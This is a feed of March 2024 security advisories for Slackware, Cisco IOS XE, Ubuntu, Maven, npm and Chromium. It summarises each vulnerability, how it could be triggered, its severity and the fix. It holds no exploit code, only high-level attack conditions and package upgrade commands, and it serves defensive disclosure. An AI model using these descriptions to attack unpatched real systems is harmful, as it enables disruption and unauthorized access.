27.03.2024 21:16:33	slackware	[SSA:2024-087-01] curl	New curl packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/curl-8.7.1-i586-1_slack15.0.txz: Upgraded. This release fixes the following security issues: TLS certificate check bypass with mbedTLS. HTTP/2 push headers memory-leak. QUIC certificate check bypass with wolfSSL. Usage of disabled protocol. For more information, see: https://curl.se/docs/CVE-2024-2466.html https://curl.se/docs/CVE-2024-2398.html https://curl.se/docs/CVE-2024-2379.html https://curl.se/docs/CVE-2024-2004.html https://www.cve.org/CVERecord?id=CVE-2024-2466 https://www.cve.org/CVERecord?id=CVE-2024-2398 https://www.cve.org/CVERecord?id=CVE-2024-2379 https://www.cve.org/CVERecord?id=CVE-2024-2004 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/curl-8.7.1-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/curl-8.7.1-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/curl-8.7.1-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/curl-8.7.1-x86_64-1.txzMD5 signaturesSlackware 15.0 package:6dcc367eb1662d18d27634964e3edc43 curl-8.7.1-i586-1_slack15.0.txzSlackware x86_64 15.0 package:ab44b6a97d7c8fcf8ac68d5a1ccf7198 curl-8.7.1-x86_64-1_slack15.0.txzSlackware -current package:06338d1a2e44fc4c0401237ab2ed9847 n/curl-8.7.1-i586-1.txzSlackware x86_64 -current package:819a75ff741c056206f9b2d37a1ada1c n/curl-8.7.1-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg curl-8.7.1-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-087-01
27.03.2024 23:56:04	maven	[MAVEN:GHSA-R3HX-QFH5-R9M7] Elasticsearch Incorrect Authorization vulnerability (moderate)	Incorrect Authorization issue exists in the API key based security model for Remote Cluster Security, which is currently in Beta, in Elasticsearch 8.10.0 and before 8.13.0. This allows a malicious user with a valid API key for a remote cluster configured to use the new Remote Cluster Security to read arbitrary documents from any index on the remote cluster, and only if they use the Elasticsearch custom transport protocol to issue requests with the target index ID, the shard ID and the document ID. None of Elasticsearch REST API endpoints are affected by this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R3HX-QFH5-R9M7
27.03.2024 23:56:09	maven	[MAVEN:GHSA-W5GG-2Q56-6H4F] Elasticsearch Uncontrolled Resource Consumption vulnerability (moderate)	A flaw was discovered in Elasticsearch, where processing a document in a deeply nested pipeline on an ingest node could cause the Elasticsearch node to crash.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W5GG-2Q56-6H4F
27.03.2024 18:00:00	cisco	[CISCO-SA-WLC-MDNS-DOS-4HV6PBGF] Cisco IOS XE Software for Wireless LAN Controllers Multicast DNS Denial of Service Vulnerability (high)	A vulnerability in the multicast DNS (mDNS) gateway feature of Cisco IOS XE Software for Wireless LAN Controllers (WLCs) could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition.This vulnerability is due to improper management of mDNS client entries. An attacker could exploit this vulnerability by connecting to the wireless network and sending a continuous stream of specific mDNS packets. A successful exploit could allow the attacker to cause the wireless controller to have high CPU utilization, which could lead to access points (APs) losing their connection to the controller and result in a DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-WLC-MDNS-DOS-4HV6PBGF
27.03.2024 18:00:00	cisco	[CISCO-SA-LISP-3GYXS3QP] Cisco IOS and IOS XE Software Locator ID Separation Protocol Denial of Service Vulnerability (high)	A vulnerability in the Locator ID Separation Protocol (LISP) feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload.This vulnerability is due to the incorrect handling of LISP packets. An attacker could exploit this vulnerability by sending a crafted LISP packet to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a denial of service (DoS) condition.Note: This vulnerability could be exploited over either IPv4 or IPv6 transport.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-LISP-3GYXS3QP
27.03.2024 18:00:00	cisco	[CISCO-SA-ISIS-SGJYOUHX] Cisco IOS and IOS XE Software Intermediate System-to-Intermediate System Denial of Service Vulnerability (high)	A vulnerability in the Intermediate System-to-Intermediate System (IS-IS) protocol of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to insufficient input validation when parsing an ingress IS-IS packet. An attacker could exploit this vulnerability by sending a crafted IS-IS packet to an affected device after forming an adjacency. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition.Note: The IS-IS protocol is a routing protocol. To exploit this vulnerability, an attacker must be Layer 2-adjacent to the affected device and have formed an adjacency.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISIS-SGJYOUHX
27.03.2024 18:00:00	cisco	[CISCO-SA-IOSXE-WLC-PRIVESC-RJSMRMPK] Cisco IOS XE Software for Wireless LAN Controllers Privilege Escalation Vulnerability (medium)	A vulnerability in the CLI of Cisco IOS XE Software could allow an authenticated, low-privileged, local attacker to access WLAN configuration details including passwords.This vulnerability is due to improper privilege checks. An attacker could exploit this vulnerability by using the show and show tech wireless CLI commands to access configuration details, including passwords. A successful exploit could allow the attacker to access configuration details that they are not authorized to access.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXE-WLC-PRIVESC-RJSMRMPK
27.03.2024 18:00:00	cisco	[CISCO-SA-IOSXE-UTD-CMD-JBL8KVHT] Cisco IOS XE Software Unified Threat Defense Command Injection Vulnerability (medium)	A vulnerability in the Unified Threat Defense (UTD) configuration CLI of Cisco IOS XE Software could allow an authenticated, local attacker to execute arbitrary commands as root on the underlying host operating system. To exploit this vulnerability, an attacker must have level 15 privileges on the affected device.This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by submitting a crafted CLI command to an affected device. A successful exploit could allow the attacker to execute arbitrary commands as root on the underlying operating system.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-priv-cmd-esc-JbL8KvHT ["https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-priv-cmd-esc-JbL8KvHT"]This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXE-UTD-CMD-JBL8KVHT
27.03.2024 18:00:00	cisco	[CISCO-SA-IOSXE-PRIV-ESC-SEAX6NLX] Cisco IOS XE Software Privilege Escalation Vulnerability (medium)	A vulnerability in the NETCONF feature of Cisco IOS XE Software could allow an authenticated, remote attacker to elevate privileges to root on an affected device.This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted input over NETCONF to an affected device. A successful exploit could allow the attacker to elevate privileges from Administrator to root.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXE-PRIV-ESC-SEAX6NLX
27.03.2024 18:00:00	cisco	[CISCO-SA-IOSXE-OSPF-DOS-DR9SFRXP] Cisco IOS XE Software OSPFv2 Denial of Service Vulnerability (high)	A vulnerability in the OSPF version 2 (OSPFv2) feature of Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition.This vulnerability is due to improper validation of OSPF updates that are processed by a device. An attacker could exploit this vulnerability by sending a malformed OSPF update to the device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXE-OSPF-DOS-DR9SFRXP
27.03.2024 18:00:00	cisco	[CISCO-SA-IOS-XE-SDA-EDGE-DOS-QZWUWXWG] Cisco IOS XE Software SD-Access Fabric Edge Node Denial of Service Vulnerability (high)	A vulnerability in the IPv4 Software-Defined Access (SD-Access) fabric edge node feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause high CPU utilization and stop all traffic processing, resulting in a denial of service (DoS) condition on an affected device.This vulnerability is due to improper handling of certain IPv4 packets. An attacker could exploit this vulnerability by sending certain IPv4 packets to an affected device. A successful exploit could allow the attacker to cause the device to exhaust CPU resources and stop processing traffic, resulting in a DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOS-XE-SDA-EDGE-DOS-QZWUWXWG
27.03.2024 18:00:00	cisco	[CISCO-SA-IOS-DOS-HQ4D3TZG] Cisco IOS Software for Catalyst 6000 Series Switches Denial of Service Vulnerability (high)	A vulnerability in Cisco IOS Software for Cisco Catalyst 6000 Series Switches could allow an unauthenticated, adjacent attacker to cause an affected device to reload unexpectedly.This vulnerability is due to improper handling of process-switched traffic. An attacker could exploit this vulnerability by sending crafted traffic to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOS-DOS-HQ4D3TZG
27.03.2024 18:00:00	cisco	[CISCO-SA-IKEV1-NO2CCFWZ] Cisco IOS and IOS XE Software Internet Key Exchange Version 1 Fragmentation Denial of Service Vulnerabilities (high)	Multiple vulnerabilities in the Internet Key Exchange version 1 (IKEv1) fragmentation feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a heap overflow or corruption on an affected system.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are workarounds that address these vulnerabilities.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IKEV1-NO2CCFWZ
27.03.2024 18:00:00	cisco	[CISCO-SA-DMI-ACL-BYPASS-XV8FO8VZ] Cisco IOS XE Software NETCONF/RESTCONF IPv4 Access Control List Bypass Vulnerability (medium)	A vulnerability in the data model interface (DMI) services of Cisco IOS XE Software could allow an unauthenticated, remote attacker to access resources that should have been protected by a configured IPv4 access control list (ACL).This vulnerability is due to improper handling of error conditions when a successfully authorized device administrator updates an IPv4 ACL using the NETCONF or RESTCONF protocol, and the update would reorder access control entries (ACEs) in the updated ACL. An attacker could exploit this vulnerability by accessing resources that should have been protected across an affected device.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-DMI-ACL-BYPASS-XV8FO8VZ
27.03.2024 18:00:00	cisco	[CISCO-SA-DHCP-DOS-T3CXPO9Z] Cisco IOS XE Software DHCP Snooping with Endpoint Analytics Denial of Service Vulnerability (high)	A vulnerability in the DHCP snooping feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition.This vulnerability is due to a crafted IPv4 DHCP request packet being mishandled when endpoint analytics are enabled. An attacker could exploit this vulnerability by sending a crafted DHCP request through an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.Note: The attack vector is listed as network because a DHCP relay anywhere on the network could allow exploits from networks other than the adjacent one.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2023 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-DHCP-DOS-T3CXPO9Z
27.03.2024 18:00:00	cisco	[CISCO-SA-CCC-AUTHZ-BYPASS-5EKCHJRB] Cisco Catalyst Center Authorization Bypass Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Catalyst Center, formerly Cisco DNA Center, could allow an authenticated, remote attacker to change specific data within the interface on an affected device.This vulnerability is due to insufficient authorization enforcement. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to change a specific field within the web-based management interface, even though they should not have access to change that field.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CCC-AUTHZ-BYPASS-5EKCHJRB
27.03.2024 18:00:00	cisco	[CISCO-SA-AUX-333WBZ8F] Cisco IOS XE Software Auxiliary Asynchronous Port Denial of Service Vulnerability (medium)	A vulnerability in auxiliary asynchronous port (AUX) functions of Cisco IOS XE Software could allow an authenticated, local attacker to cause an affected device to reload or stop responding.This vulnerability is due to the incorrect handling of specific ingress traffic when flow control hardware is enabled on the AUX port. An attacker could exploit this vulnerability by reverse telnetting to the AUX port and sending specific data after connecting. A successful exploit could allow the attacker to cause the device to reset or stop responding, resulting in a denial of service (DoS) condition.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-AUX-333WBZ8F
27.03.2024 18:00:00	cisco	[CISCO-SA-AP-SECUREBOOT-BYPASS-ZT5VJKSD] Cisco Access Point Software Secure Boot Bypass Vulnerability (high)	A vulnerability in the boot process of Cisco Access Point (AP) Software could allow an unauthenticated, physical attacker to bypass the Cisco Secure Boot functionality and load a software image that has been tampered with on an affected device.This vulnerability exists because unnecessary commands are available during boot time at the physical console. An attacker could exploit this vulnerability by interrupting the boot process and executing specific commands to bypass the Cisco Secure Boot validation checks and load an image that has been tampered with. This image would have been previously downloaded onto the targeted device. A successful exploit could allow the attacker to load the image once. The Cisco Secure Boot functionality is not permanently compromised.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-AP-SECUREBOOT-BYPASS-ZT5VJKSD
27.03.2024 18:00:00	cisco	[CISCO-SA-AP-DOS-H9TGGX6W] Cisco Access Point Software Denial of Service Vulnerability (high)	A vulnerability in the IP packet processing of Cisco Access Point (AP) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to insufficient input validation of certain IPv4 packets. An attacker could exploit this vulnerability by sending a crafted IPv4 packet either to or through an affected device. A successful exploit could allow the attacker to cause an affected device to reload unexpectedly, resulting in a DoS condition. To successfully exploit this vulnerability, the attacker does not need to be associated with the affected AP. This vulnerability cannot be exploited by sending IPv6 packets.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-AP-DOS-H9TGGX6W
27.03.2024 18:00:00	cisco	[CISCO-SA-AIRO-AP-DOS-PPPTCVW] Cisco Aironet Access Point Software Resource Exhaustion Denial of Service Vulnerability (medium)	A vulnerability in the handling of encrypted wireless frames of Cisco Aironet Access Point (AP) Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on the affected device.This vulnerability is due to incomplete cleanup of resources when dropping certain malformed frames. An attacker could exploit this vulnerability by connecting as a wireless client to an affected AP and sending specific malformed frames over the wireless connection. A successful exploit could allow the attacker to cause degradation of service to other clients, which could potentially lead to a complete DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-AIRO-AP-DOS-PPPTCVW
27.03.2024 17:23:13	ubuntu	[USN-6719-1] util-linux vulnerability	util-linux could be made to expose sensitive information.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6719-1
27.03.2024 16:59:43	ubuntu	[USN-6718-2] curl vulnerability	curl could be made to denial of service.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6718-2
27.03.2024 13:43:38	ubuntu	[USN-6718-1] curl vulnerabilities	Several security issues were fixed in curl.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6718-1
27.03.2024 23:58:42	maven	[MAVEN:GHSA-5667-3WCH-7Q7W] Eclipse Vert.x memory leak (moderate)	A vulnerability in the Eclipse Vert.x toolkit results in a memory leak due to using Netty FastThreadLocal data structures. Specifically, when the Vert.x HTTP client establishes connections to different hosts, triggering the memory leak. The leak can be accelerated with intimate runtime knowledge, allowing an attacker to exploit this vulnerability. For instance, a server accepting arbitrary internet addresses could serve as an attack vector by connecting to these addresses, thereby accelerating the memory leak.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5667-3WCH-7Q7W
27.03.2024 09:00:00	msrc	[MS:CVE-2024-2883] Chromium: CVE-2024-2883 Use after free in ANGLE		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2883
27.03.2024 09:00:00	msrc	[MS:CVE-2024-2885] Chromium: CVE-2024-2885 Use after free in Dawn		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2885
27.03.2024 09:00:00	msrc	[MS:CVE-2024-2886] Chromium: CVE-2024-2886 Use after free in WebCodecs		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2886
27.03.2024 09:00:00	msrc	[MS:CVE-2024-2887] Chromium: CVE-2024-2887 Type Confusion in WebAssembly		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2887
27.03.2024 23:59:27	maven	[MAVEN:GHSA-6PWG-GG6J-5CRM] Ignite Realtime Openfire privilege escalation vulnerability (high)	An issue in Ignite Realtime Openfire v.4.8.0 and before allows a remote attacker to escalate privileges via the ROOM_CACHE component.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6PWG-GG6J-5CRM
27.03.2024 23:59:22	maven	[MAVEN:GHSA-5XVC-RWV8-86P7] Ignite Realtime Openfire privilege escalation vulnerability (high)	An issue in Ignite Realtime Openfire v.4.8.0 and before allows a remote attacker to escalate privileges via the admin.authorizedJIDs system property component.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5XVC-RWV8-86P7
29.03.2024 04:31:04	slackware	[SSA:2024-088-03] coreutils (medium)	New coreutils packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/coreutils-9.5-i586-1_slack15.0.txz: Upgraded. chmod -R now avoids a race where an attacker may replace a traversed file with a symlink, causing chmod to operate on an unintended file. [This bug was present in "the beginning".] split --line-bytes with a mixture of very long and short lines no longer overwrites the heap. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-0684 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/coreutils-9.5-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/coreutils-9.5-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/coreutils-9.5-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/coreutils-9.5-x86_64-1.txzMD5 signaturesSlackware 15.0 package:3d9096c0d9adf3f53a643cc10f8f030f coreutils-9.5-i586-1_slack15.0.txzSlackware x86_64 15.0 package:655547308015cd3f555f44791727acd4 coreutils-9.5-x86_64-1_slack15.0.txzSlackware -current package:4ebc7ecd4ebd0d6e9c6d0b1072f5e61a a/coreutils-9.5-i586-1.txzSlackware x86_64 -current package:8f9f0cda9c123f022063eedd2461290f a/coreutils-9.5-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg coreutils-9.5-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-088-03
28.03.2024 23:56:23	slackware	[SSA:2024-088-02] util-linux	New util-linux packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/util-linux-2.37.4-i586-3_slack15.0.txz: Rebuilt. This release fixes a vulnerability where the wall command did not filter escape sequences from command line arguments, allowing unprivileged users to put arbitrary text on other users terminals. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-28085 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/util-linux-2.37.4-i586-3_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/util-linux-2.37.4-x86_64-3_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/util-linux-2.40-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/util-linux-2.40-x86_64-1.txzMD5 signaturesSlackware 15.0 package:3cd4404f3936f17e7f0ab70a4db3c3c5 util-linux-2.37.4-i586-3_slack15.0.txzSlackware x86_64 15.0 package:bb90b0b99780f22a4bce3829235169c5 util-linux-2.37.4-x86_64-3_slack15.0.txzSlackware -current package:46535176e55cabab56994a2031acd643 a/util-linux-2.40-i586-1.txzSlackware x86_64 -current package:a16777d05bd73065cad733ee2a24f660 a/util-linux-2.40-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg util-linux-2.37.4-i586-3_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-088-02
28.03.2024 23:55:57	slackware	[SSA:2024-088-01] seamonkey	New seamonkey packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/seamonkey-2.53.18.2-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.seamonkey-project.org/releases/seamonkey2.53.18.2 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/seamonkey-2.53.18.2-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/seamonkey-2.53.18.2-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/seamonkey-2.53.18.2-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/seamonkey-2.53.18.2-x86_64-1.txzMD5 signaturesSlackware 15.0 package:2dbdccdb494729f90d6d0954b561878c seamonkey-2.53.18.2-i686-1_slack15.0.txzSlackware x86_64 15.0 package:25be813d3882c6b54cee637768abd8b7 seamonkey-2.53.18.2-x86_64-1_slack15.0.txzSlackware -current package:2d38cdda257357ada4c630651f3d9aa3 xap/seamonkey-2.53.18.2-i686-1.txzSlackware x86_64 -current package:8cfff0e1b9750a00689cb6e5e8100a18 xap/seamonkey-2.53.18.2-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg seamonkey-2.53.18.2-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-088-01
28.03.2024 22:44:52	ubuntu	[USN-6707-4] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6707-4
28.03.2024 22:40:23	ubuntu	[USN-6704-4] Linux kernel (Intel IoTG) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6704-4
29.03.2024 22:16:23	npm	[NPM:GHSA-34H3-8MW4-QW57] @electron/packager's build process memory potentially leaked into final executable (high)	### ImpactA random segment of ~1-10kb of Node.js heap memory allocated either side of a known buffer will be leaked into the final executable. This memory _could_ contain sensitive information such as environment variables, secrets files, etc.### PatchesThis issue is patched in 18.3.1### WorkaroundsNo workarounds, please update to a patched version of `@electron/packager` immediately if impacated.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-34H3-8MW4-QW57
29.03.2024 22:16:02	npm	[NPM:GHSA-35W3-6QHC-474V] @workos-inc/authkit-nextjs session replay vulnerability (moderate)	### ImpactA user can reuse an expired session by controlling the `x-workos-session` header.### PatchesPatched in https://github.com/workos/authkit-nextjs/releases/tag/v0.4.2	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-35W3-6QHC-474V
29.03.2024 21:04:00	npm	[NPM:GHSA-W387-5QQW-7G8M] Content-Security-Policy header generation in middleware could be compromised by malicious injections (high)	### ImpactWhen the following conditions are met:- Automated CSP headers generation for SSR content is enabled- The web application serves content that can be partially controlled by external usersThen it is possible that the CSP headers generation feature might be "allow-listing" malicious injected resources like inlined JS, or references to external malicious scripts.### PatchesAvailable in version 1.3.0 .### Workarounds- Do not enable CSP headers generation.- Use it only for dynamically generated content that cannot be controlled by external users in any way.### References_Are there any links users can visit to find out more?_	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W387-5QQW-7G8M
